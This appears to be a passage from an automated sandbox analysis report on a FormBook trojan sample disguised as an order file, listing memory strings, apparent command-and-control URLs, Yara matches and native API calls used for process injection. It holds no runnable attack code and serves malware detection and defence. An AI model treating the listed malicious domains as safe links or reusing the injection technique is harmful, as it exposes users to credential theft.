Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.3
Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/28903/search.png)
Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)
Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/29590/bg1.png)
Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000000.00000002.2120287530.0000000002953000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://searchdiscovered.com/__media__/images/logo.gif)
Source: compact.exe, 0000000A.00000002.4574298276.0000000004C74000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000003A04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://superunicornpalace.com/mwa4/?Y6vp=3PLd8j&OdjTHtuX=BKtoJfTGgHJzrpd1kXP6JuCpnJS0Vaq/yhZppoO2EP3
Source: EUSOiCcoIEEJJ.exe, 0000000D.00000002.4576370278.0000000004E30000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.hondamechanic.today
Source: EUSOiCcoIEEJJ.exe, 0000000D.00000002.4576370278.0000000004E30000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.hondamechanic.today/pv57/
Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.mengistiebethlehem.com/Christmas_City_Studio.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe
Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000000A.00000002.4577738363.0000000006460000.00000004.00000800.00020000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.mengistiebethlehem.com/Lehigh_Valley.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe1UYWx%2F
Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.mengistiebethlehem.com/Moravia.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe1UYWx%2FFitbFc
Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000000A.00000002.4577738363.0000000006460000.00000004.00000800.00020000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.mengistiebethlehem.com/display.cfm
Source: compact.exe, 0000000A.00000002.4577934774.0000000007F58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdn.consentmanager.net
Source: compact.exe, 0000000A.00000002.4577934774.0000000007F58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: compact.exe, 0000000A.00000002.4577934774.0000000007F58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: compact.exe, 0000000A.00000002.4577934774.0000000007F58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://delivery.consentmanager.net
Source: compact.exe, 0000000A.00000002.4577934774.0000000007F58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: compact.exe, 0000000A.00000002.4577934774.0000000007F58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: compact.exe, 0000000A.00000002.4577934774.0000000007F58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: compact.exe, 0000000A.00000002.4574298276.0000000004308000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000003098000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://hao7.vip
Source: compact.exe, 0000000A.00000002.4574298276.0000000004AE2000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000000A.00000002.4577738363.0000000006460000.00000004.00000800.00020000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000003872000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://img.sedoparking.com/templates/images/hero_nc.svg
Source: compact.exe, 0000000A.00000002.4565290385.000000000312A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: compact.exe, 0000000A.00000002.4565290385.00000000030FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: compact.exe, 0000000A.00000003.2683460496.0000000007F3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: compact.exe, 0000000A.00000002.4565290385.00000000030FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: compact.exe, 0000000A.00000002.4565290385.00000000030FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: compact.exe, 0000000A.00000002.4565290385.000000000312A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: compact.exe, 0000000A.00000002.4565290385.00000000030FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: compact.exe, 0000000A.00000002.4565290385.00000000030FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: compact.exe, 0000000A.00000002.4565290385.000000000312A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://support.hostgator.com/
Source: compact.exe, 0000000A.00000002.4577934774.0000000007F58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 0000000E.00000002.2790664074.00000000256C4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.fondazionegtech.org/jmiz/?OdjTHtuX=FlIs%20r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWK
Source: compact.exe, 0000000A.00000002.4574298276.0000000004AE2000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000000A.00000002.4577738363.0000000006460000.00000004.00000800.00020000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000003872000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=easybackpage.net
Source: EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000003872000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4565204551.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2506704352.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4571364654.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4576370278.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2507910619.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.4565204551.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.2506704352.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.4571364654.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.4576370278.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.2507910619.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

.NET source code contains very large array initializations

Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.77e0000.5.raw.unpack, -Module-.cs	Large array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.27bc388.0.raw.unpack, -Module-.cs	Large array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe

Contains functionality to call native functions

Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0042B683 NtClose,	5_2_0042B683
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2B60 NtClose,LdrInitializeThunk,	5_2_013F2B60
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_013F2DF0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_013F2C70
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F35C0 NtCreateMutant,LdrInitializeThunk,	5_2_013F35C0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F4340 NtSetContextThread,	5_2_013F4340
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F4650 NtSuspendThread,	5_2_013F4650
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2BA0 NtEnumerateValueKey,	5_2_013F2BA0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2B80 NtQueryInformationFile,	5_2_013F2B80
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2BF0 NtAllocateVirtualMemory,	5_2_013F2BF0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2BE0 NtQueryValueKey,	5_2_013F2BE0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2AB0 NtWaitForSingleObject,	5_2_013F2AB0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2AF0 NtWriteFile,	5_2_013F2AF0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2AD0 NtReadFile,	5_2_013F2AD0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2D30 NtUnmapViewOfSection,	5_2_013F2D30
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2D10 NtMapViewOfSection,	5_2_013F2D10
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2D00 NtSetInformationFile,	5_2_013F2D00
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2DB0 NtEnumerateKey,	5_2_013F2DB0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2DD0 NtDelayExecution,	5_2_013F2DD0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2C00 NtQueryInformationProcess,	5_2_013F2C00
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2C60 NtCreateKey,	5_2_013F2C60
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2CA0 NtQueryInformationToken,	5_2_013F2CA0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2CF0 NtOpenProcess,	5_2_013F2CF0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2CC0 NtQueryVirtualMemory,	5_2_013F2CC0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2F30 NtCreateSection,	5_2_013F2F30
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2F60 NtCreateProcessEx,	5_2_013F2F60
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2FB0 NtResumeThread,	5_2_013F2FB0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2FA0 NtQuerySection,	5_2_013F2FA0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2F90 NtProtectVirtualMemory,	5_2_013F2F90
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2FE0 NtCreateFile,	5_2_013F2FE0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2E30 NtWriteVirtualMemory,	5_2_013F2E30
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2EA0 NtAdjustPrivilegesToken,	5_2_013F2EA0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2E80 NtReadVirtualMemory,	5_2_013F2E80
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F2EE0 NtQueueApcThread,	5_2_013F2EE0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F3010 NtOpenDirectoryObject,	5_2_013F3010
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F3090 NtSetValueKey,	5_2_013F3090
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F39B0 NtGetContextThread,	5_2_013F39B0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F3D10 NtOpenProcessToken,	5_2_013F3D10
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F3D70 NtOpenThread,	5_2_013F3D70
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03604340 NtSetContextThread,LdrInitializeThunk,	10_2_03604340
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03604650 NtSuspendThread,LdrInitializeThunk,	10_2_03604650
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602B60 NtClose,LdrInitializeThunk,	10_2_03602B60
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602BE0 NtQueryValueKey,LdrInitializeThunk,	10_2_03602BE0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	10_2_03602BF0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602BA0 NtEnumerateValueKey,LdrInitializeThunk,	10_2_03602BA0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602AF0 NtWriteFile,LdrInitializeThunk,	10_2_03602AF0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602AD0 NtReadFile,LdrInitializeThunk,	10_2_03602AD0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602F30 NtCreateSection,LdrInitializeThunk,	10_2_03602F30
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602FE0 NtCreateFile,LdrInitializeThunk,	10_2_03602FE0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602FB0 NtResumeThread,LdrInitializeThunk,	10_2_03602FB0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602EE0 NtQueueApcThread,LdrInitializeThunk,	10_2_03602EE0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602E80 NtReadVirtualMemory,LdrInitializeThunk,	10_2_03602E80
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602D30 NtUnmapViewOfSection,LdrInitializeThunk,	10_2_03602D30
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602D10 NtMapViewOfSection,LdrInitializeThunk,	10_2_03602D10
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602DF0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_03602DF0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602DD0 NtDelayExecution,LdrInitializeThunk,	10_2_03602DD0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602C60 NtCreateKey,LdrInitializeThunk,	10_2_03602C60
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602C70 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_03602C70
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602CA0 NtQueryInformationToken,LdrInitializeThunk,	10_2_03602CA0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_036035C0 NtCreateMutant,LdrInitializeThunk,	10_2_036035C0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_036039B0 NtGetContextThread,LdrInitializeThunk,	10_2_036039B0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602B80 NtQueryInformationFile,	10_2_03602B80
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602AB0 NtWaitForSingleObject,	10_2_03602AB0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602F60 NtCreateProcessEx,	10_2_03602F60
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602FA0 NtQuerySection,	10_2_03602FA0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602F90 NtProtectVirtualMemory,	10_2_03602F90
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602E30 NtWriteVirtualMemory,	10_2_03602E30
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602EA0 NtAdjustPrivilegesToken,	10_2_03602EA0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602D00 NtSetInformationFile,	10_2_03602D00
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602DB0 NtEnumerateKey,	10_2_03602DB0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602C00 NtQueryInformationProcess,	10_2_03602C00
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602CF0 NtOpenProcess,	10_2_03602CF0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03602CC0 NtQueryVirtualMemory,	10_2_03602CC0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03603010 NtOpenDirectoryObject,	10_2_03603010
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03603090 NtSetValueKey,	10_2_03603090
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03603D70 NtOpenThread,	10_2_03603D70
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03603D10 NtOpenProcessToken,	10_2_03603D10
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_02E382E0 NtClose,	10_2_02E382E0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_02E38250 NtDeleteFile,	10_2_02E38250
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_02E38010 NtCreateFile,	10_2_02E38010
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_02E38170 NtReadFile,	10_2_02E38170
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_02E38430 NtAllocateVirtualMemory,	10_2_02E38430

Detected potential crypto function

Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_00A74B0C	0_2_00A74B0C
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_00A7D364	0_2_00A7D364
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_047C6C58	0_2_047C6C58
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_047C5D30	0_2_047C5D30
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_047C1198	0_2_047C1198
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_053072F0	0_2_053072F0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_05307F28	0_2_05307F28
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_05302460	0_2_05302460
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_05302459	0_2_05302459
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_05308779	0_2_05308779
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_0530279F	0_2_0530279F
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_05308788	0_2_05308788
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_053027EB	0_2_053027EB
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_0530F630	0_2_0530F630
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_05303D30	0_2_05303D30
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_05307F18	0_2_05307F18
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_05303EE3	0_2_05303EE3
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_05301918	0_2_05301918
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_0530190A	0_2_0530190A
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_05307978	0_2_05307978
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_05307967	0_2_05307967
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_0530FA68	0_2_0530FA68
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_004010B0	5_2_004010B0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_00403140	5_2_00403140
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0041020A	5_2_0041020A
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_00410213	5_2_00410213
